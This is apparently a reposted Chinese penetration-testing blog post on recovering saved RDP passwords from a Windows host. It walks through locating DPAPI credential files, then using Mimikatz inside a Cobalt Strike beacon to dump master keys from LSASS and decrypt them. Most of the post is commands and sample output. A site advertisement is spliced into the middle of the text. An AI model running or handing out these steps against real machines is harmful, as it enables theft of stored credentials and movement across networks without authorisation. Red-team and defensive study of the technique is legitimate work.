内网渗透 | 获取远程主机保存的RDP凭据密码

简要记录获取远程主机rdp凭据的方法。

Windows保存RDP凭据的目录为:

C:\Users\用户名\AppData\Local\Microsoft\Credentials

可以通过命令行获取,执行以下命令:

cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force

注意:

cmdkey /list

命令必须在Session会话下执行,在system下执行不会有结果。

内网渗透 | 获取远程主机保存的RDP凭据密码

使用Cobalt Strike中的Mimikatz可以获取部分所需的masterkey和pbData:

mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID

输出应类似于:

**BLOB**  dwVersion : 00000001 - 1  guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}  dwMasterKeyVersion : 00000001 - 1  guidMasterKey : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}  dwFlags : 20000000 - 536870912 (system ; )  dwDescriptionLen : 00000012 - 18  szDescription : 本地凭据数据  algCrypt : 00006610 - 26128 (CALG_AES_256)  dwAlgCryptLen : 00000100 - 256  dwSaltLen : 00000020 - 32  pbSalt : 726d845b8a4eba29875****10659ec2d5e210a48f  dwHmacKeyLen : 00000000 - 0  pbHmackKey :  algHash : 0000800e - 32782 (CALG_SHA_512)  dwAlgHashLen : 00000200 - 512  dwHmac2KeyLen : 00000020 - 32  pbHmack2Key : cda4760ed3fb1c7874****28973f5b5b403fe31f233  dwDataLen : 000000c0 - 192  pbData : d268f81c64a3867cd7e96d99578295ea55a47fcaad5f7dd6678989117fc565906cc5a8bfd37137171302b34611ba5****e0b94ae399f9883cf80050f0972693d72b35a9a90918a06d  dwSignLen : 00000040 - 64  pbSign : 63239d3169c99fd82404c0e230****37504cfa332bea4dca0655

需要关注的是

guidMasterKey

pbData

,其中

pbData

是我们要解密的数据,

guidMasterKey

是解密所需的密钥。LSASS已经在其缓存中存有这个key,因此我们可以使用

SeDebugPrivilege

获取。

存了个图 存了个图

视频图片解析/字幕/剪辑,视频高清保存/图片源图提取

存了个图 17 查看详情 存了个图

beacon> mimikatz !sekurlsa::dpapi

输出应类似于:

mimikatz !sekurlsa::dpapi     [00000001]     * GUID : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}     * Time : 2020/1/3 8:05:02     * MasterKey : 02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148     * sha1(key) : 3e6dc57a0fe****a902cfaf617b1322     [00000002]     * GUID : {edcb491a-91d7-4d98-a714-8bc60254179f}     * Time : 2020/1/3 8:05:02     * MasterKey : c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202     * sha1(key) : 5e1b3eb1152d3****6d3d6f90aaeb

然后将凭据保存到本地,执行以下命令:

mimikatz "dpapi::cred /in:C:\Users\USERNAME\Desktop\test\SESSION /masterkey:对应的GUID key"

内网渗透 | 获取远程主机保存的RDP凭据密码

原创作者: Sp4ce

参考来源: Sp4ce’s Blog

以上就是内网渗透 | 获取远程主机保存的RDP凭据密码的详细内容,更多请关注创想鸟其它相关文章!

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/387430.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2025年11月6日 14:16:14
下一篇 2025年11月6日 14:17:48

相关推荐

发表回复

登录后才能评论
关注微信